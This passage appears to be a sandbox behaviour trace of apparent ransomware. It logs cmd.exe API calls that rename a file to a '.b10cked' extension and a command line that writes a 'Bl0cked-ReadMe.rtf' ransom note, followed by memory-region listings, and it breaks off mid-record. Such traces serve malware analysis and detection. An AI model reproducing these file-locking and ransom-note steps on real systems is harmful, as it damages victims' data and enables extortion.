[0150.836] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0150.836] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0150.836] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0150.836] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0150.837] _wcsicmp (_String1="move", _String2=")") returned 68 [0150.837] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0150.837] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0150.837] _wcsicmp (_String1="IF", _String2="move") returned -4 [0150.837] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0150.837] _wcsicmp (_String1="REM", _String2="move") returned 5 [0150.837] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0150.840] GetConsoleTitleW (in: lpConsoleTitle=0x2ef5f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.924] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0150.924] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0150.924] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0150.924] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0150.924] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0150.924] _wcsicmp (_String1="move", _String2="CD") returned 10 [0150.924] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0150.924] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0150.924] _wcsicmp (_String1="move", _String2="REN") returned -5 [0150.924] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0150.924] _wcsicmp (_String1="move", _String2="SET") returned -6 [0150.924] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0150.924] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0150.924] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0150.924] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0150.924] _wcsicmp 
(_String1="move", _String2="MD") returned 11 [0150.924] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0150.924] _wcsicmp (_String1="move", _String2="RD") returned -5 [0150.924] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0150.924] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0150.924] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0150.924] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0150.924] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0150.924] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0150.924] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0150.924] _wcsicmp (_String1="move", _String2="VER") returned -9 [0150.924] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0150.925] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0150.925] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0150.925] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0150.925] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0150.925] _wcsicmp (_String1="move", _String2="START") returned -6 [0150.925] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0150.925] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0150.925] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0150.927] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0150.927] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0150.927] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ef3ac, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ef3a4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef3a4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0150.927] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0150.927] _wcsnicmp (_String1="COPYCMD", 
_String2="ALLUSER", _MaxCount=0x7) returned 2 [0150.927] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0150.927] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0150.927] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0150.927] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0150.927] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0150.927] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0150.927] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0150.927] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) 
returned -13 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0150.929] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0150.929] _wcsicmp (_String1="Active.GRL", _String2=".") returned 51 [0150.929] _wcsicmp (_String1="Active.GRL", _String2="..") returned 51 [0150.929] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\active.grl")) returned 0x20 [0150.929] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3e1d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0150.929] SetErrorMode (uMode=0x0) returned 0x0 [0150.929] SetErrorMode (uMode=0x1) returned 0x0 [0150.929] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL", nBufferLength=0x104, lpBuffer=0x2eed34, lpFilePart=0x2eed1c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL", lpFilePart=0x2eed1c*="Active.GRL") returned 0x28 [0150.929] SetErrorMode (uMode=0x0) returned 0x1 [0150.929] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF" (normalized: "c:\\users\\alluse~1\\micros~1\\mf")) returned 0x2010 [0150.930] _wcsicmp (_String1="Active.GRL", _String2=".") returned 51 [0150.930] _wcsicmp (_String1="Active.GRL", _String2="..") returned 51 [0150.930] GetFileAttributesW 
(lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\active.grl")) returned 0x20 [0150.930] SetErrorMode (uMode=0x0) returned 0x0 [0150.930] SetErrorMode (uMode=0x1) returned 0x0 [0150.930] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL", nBufferLength=0x104, lpBuffer=0x2ef1b0, lpFilePart=0x2eef48 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL", lpFilePart=0x2eef48*="Active.GRL") returned 0x28 [0150.930] SetErrorMode (uMode=0x0) returned 0x1 [0150.930] SetErrorMode (uMode=0x0) returned 0x0 [0150.930] SetErrorMode (uMode=0x1) returned 0x0 [0150.930] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL.b10cked", nBufferLength=0x104, lpBuffer=0x2ef3b8, lpFilePart=0x2eef48 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL.b10cked", lpFilePart=0x2eef48*="Active.GRL.b10cked") returned 0x30 [0150.930] SetErrorMode (uMode=0x0) returned 0x1 [0150.930] SetLastError (dwErrCode=0x0) [0150.930] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\active.grl.b10cked")) returned 0xffffffff [0150.930] GetLastError () returned 0x2 [0150.930] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL", fInfoLevelId=0x1, lpFindFileData=0x2ee8c4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ee8c4) returned 0x3d0f08 [0150.931] FindNextFileW (in: hFindFile=0x3d0f08, lpFindFileData=0x2ee8c4 | out: lpFindFileData=0x2ee8c4) returned 0 [0150.931] GetLastError () returned 0x12 [0150.931] FindClose (in: hFindFile=0x3d0f08 | out: hFindFile=0x3d0f08) returned 1 [0150.932] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL", fInfoLevelId=0x1, lpFindFileData=0x3e1ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3e1ae0) returned 0x3d0f08 [0150.933] 
GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL.b10cked", nBufferLength=0x104, lpBuffer=0x2eeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL.b10cked", lpFilePart=0x0) returned 0x30 [0150.933] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL", nBufferLength=0x104, lpBuffer=0x2eeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL", lpFilePart=0x0) returned 0x28 [0150.933] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\active.grl")) returned 0x20 [0150.933] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\active.grl"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\active.grl.b10cked"), dwFlags=0x3) returned 1 [0150.933] FindClose (in: hFindFile=0x3d0f08 | out: hFindFile=0x3d0f08) returned 1 [0150.933] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2eeb10 | out: _Buffer=" 1") returned 9 [0150.934] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.934] GetFileType (hFile=0x7) returned 0x2 [0150.934] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0150.934] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eea9c | out: lpMode=0x2eea9c) returned 1 [0150.934] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.934] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2eead0 | out: lpConsoleScreenBufferInfo=0x2eead0) returned 1 [0150.934] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0150.935] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, 
nSize=0x2000, Arguments=0x2eeb10 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0150.935] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2eeaf4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2eeaf4*=0x1a) returned 1 [0150.935] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.935] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0150.935] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.935] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0150.935] _get_osfhandle (_FileHandle=0) returned 0x3 [0150.935] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0150.936] SetConsoleInputExeNameW () returned 0x1 [0150.936] GetConsoleOutputCP () returned 0x1b5 [0150.936] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0150.936] SetThreadUILanguage (LangId=0x0) returned 0x409 [0150.936] exit (_Code=0) Process: id = "239" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167e0" os_pid = "0xc3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 19756 start_va = 0x10000 end_va = 0x2ffff 
entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19757 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 19758 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 19759 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 19760 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 19761 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19762 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19763 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19764 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 19765 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19781 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19782 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename 
= "" Region: id = 19783 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19784 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 19785 start_va = 0x4a0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 19786 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 19787 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19788 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 19789 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19790 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19791 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 19792 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = 
mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 19793 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 19794 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 19795 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 19796 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 19797 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 19798 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 19799 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 19800 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 19801 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 19802 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 19803 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000005c0000" filename = "" Region: id = 19804 start_va = 0x11c0000 end_va = 0x1322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Thread: id = 302 os_tid = 0xd00 [0150.738] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff4c | out: lpSystemTimeAsFileTime=0x12ff4c*(dwLowDateTime=0x93c8bce0, dwHighDateTime=0x1d440a9)) [0150.738] GetCurrentProcessId () returned 0xc3c [0150.738] GetCurrentThreadId () returned 0xd00 [0150.738] GetTickCount () returned 0x2e9c2 [0150.738] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff44 | out: lpPerformanceCount=0x12ff44*=20752697832) returned 1 [0150.739] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0150.739] __set_app_type (_Type=0x1) [0150.739] __p__fmode () returned 0x76b331f4 [0150.739] __p__commode () returned 0x76b331fc [0150.739] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0150.739] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0150.739] GetCurrentThreadId () returned 0xd00 [0150.739] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd00) returned 0x38 [0150.739] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0150.739] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0150.740] SetThreadUILanguage (LangId=0x0) returned 0x409 [0150.740] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0150.740] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fedc | out: phkResult=0x12fedc*=0x0) returned 0x2 [0150.740] VirtualQuery (in: lpAddress=0x12ff13, lpBuffer=0x12feac, dwLength=0x1c | out: lpBuffer=0x12feac*(BaseAddress=0x12f000, 
AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0150.740] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12feac, dwLength=0x1c | out: lpBuffer=0x12feac*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0150.740] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12feac, dwLength=0x1c | out: lpBuffer=0x12feac*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0150.740] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12feac, dwLength=0x1c | out: lpBuffer=0x12feac*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0150.740] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12feac, dwLength=0x1c | out: lpBuffer=0x12feac*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0150.740] GetConsoleOutputCP () returned 0x1b5 [0150.740] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0150.740] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0150.740] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.740] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0150.741] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.741] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0150.741] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.741] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0150.741] _get_osfhandle (_FileHandle=0) returned 0x3 [0150.741] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0150.741] _get_osfhandle (_FileHandle=0) returned 0x3 [0150.741] 
SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0150.742] GetEnvironmentStringsW () returned 0x280178* [0150.742] FreeEnvironmentStringsW (penv=0x280178) returned 1 [0150.742] GetEnvironmentStringsW () returned 0x280178* [0150.742] FreeEnvironmentStringsW (penv=0x280178) returned 1 [0150.742] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ee4c | out: phkResult=0x12ee4c*=0x40) returned 0x0 [0150.742] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ee54, lpData=0x12ee58, lpcbData=0x12ee50*=0x1000 | out: lpType=0x12ee54*=0x0, lpData=0x12ee58*=0xa0, lpcbData=0x12ee50*=0x1000) returned 0x2 [0150.742] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ee54, lpData=0x12ee58, lpcbData=0x12ee50*=0x1000 | out: lpType=0x12ee54*=0x4, lpData=0x12ee58*=0x1, lpcbData=0x12ee50*=0x4) returned 0x0 [0150.742] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ee54, lpData=0x12ee58, lpcbData=0x12ee50*=0x1000 | out: lpType=0x12ee54*=0x0, lpData=0x12ee58*=0x1, lpcbData=0x12ee50*=0x1000) returned 0x2 [0150.742] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ee54, lpData=0x12ee58, lpcbData=0x12ee50*=0x1000 | out: lpType=0x12ee54*=0x4, lpData=0x12ee58*=0x0, lpcbData=0x12ee50*=0x4) returned 0x0 [0150.742] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ee54, lpData=0x12ee58, lpcbData=0x12ee50*=0x1000 | out: lpType=0x12ee54*=0x4, lpData=0x12ee58*=0x40, lpcbData=0x12ee50*=0x4) returned 0x0 [0150.742] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ee54, lpData=0x12ee58, lpcbData=0x12ee50*=0x1000 | out: lpType=0x12ee54*=0x4, lpData=0x12ee58*=0x40, lpcbData=0x12ee50*=0x4) returned 0x0 [0150.743] RegQueryValueExW (in: hKey=0x40, 
